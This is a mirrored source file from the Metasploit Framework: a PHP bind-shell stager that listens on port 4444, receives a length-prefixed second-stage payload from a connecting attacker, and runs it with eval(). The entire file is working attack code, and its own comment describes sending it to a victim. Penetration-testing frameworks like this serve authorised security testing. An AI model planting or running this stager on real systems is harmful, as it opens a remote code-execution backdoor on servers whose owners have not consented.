mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
54 lines
1.3 KiB
PHP
Executable File
54 lines
1.3 KiB
PHP
Executable File
#<?php
|
|
|
|
# The payload handler overwrites this with the correct LPORT before sending
|
|
# it to the victim.
|
|
$port = 4444;
|
|
$ipaddr = "::";
|
|
|
|
if (is_callable('stream_socket_server')) {
|
|
$srvsock = stream_socket_server("tcp://[{$ipaddr}]:{$port}");
|
|
if (!$srvsock) { die(); }
|
|
$s = stream_socket_accept($srvsock, -1);
|
|
$s_type = 'stream';
|
|
} elseif (is_callable('socket_create_listen')) {
|
|
$srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP);
|
|
if (!$res) { die(); }
|
|
$s = socket_accept($srvsock);
|
|
$s_type = 'socket';
|
|
} elseif (is_callable('socket_create')) {
|
|
$srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP);
|
|
$res = socket_bind($srvsock, $ipaddr, $port);
|
|
if (!$res) { die(); }
|
|
$s = socket_accept($srvsock);
|
|
$s_type = 'socket';
|
|
} else {
|
|
die();
|
|
}
|
|
if (!$s) { die(); }
|
|
|
|
switch ($s_type) {
|
|
case 'stream': $len = fread($s, 4); break;
|
|
case 'socket': $len = socket_read($s, 4); break;
|
|
}
|
|
if (!$len) {
|
|
# We failed on the main socket. There's no way to continue, so
|
|
# bail
|
|
die();
|
|
}
|
|
$a = unpack("Nlen", $len);
|
|
$len = $a['len'];
|
|
|
|
$b = '';
|
|
while (strlen($b) < $len) {
|
|
switch ($s_type) {
|
|
case 'stream': $b .= fread($s, $len-strlen($b)); break;
|
|
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
|
|
}
|
|
}
|
|
|
|
# Set up the socket for the main stage to use.
|
|
$GLOBALS['msgsock'] = $s;
|
|
$GLOBALS['msgsock_type'] = $s_type;
|
|
eval($b);
|
|
die();
|